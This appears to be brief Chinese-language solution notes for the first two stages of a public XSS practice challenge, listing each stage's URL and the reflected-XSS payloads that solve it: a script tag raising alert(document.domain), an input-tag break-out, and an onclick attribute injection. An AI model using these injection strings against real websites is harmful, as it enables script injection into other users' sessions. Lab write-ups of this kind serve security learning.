XSS Challenges
test 01
测试网站:http://xss-quiz.int21h.jp/
状态:无防御
payload:<script>alert(document.domain)</script
test 02
测试网站:http://xss-quiz.int21h.jp/stage2.php?sid=1267d69f3ede86c5bf0b71492cebb1e3ceeb66d5
状态:无防御,只需要闭合input标签或者构造事件属性
payload:"> <script>alert(document.domain)</script> //01
" onclick=alert(document.domain) aa=" //02
payload 02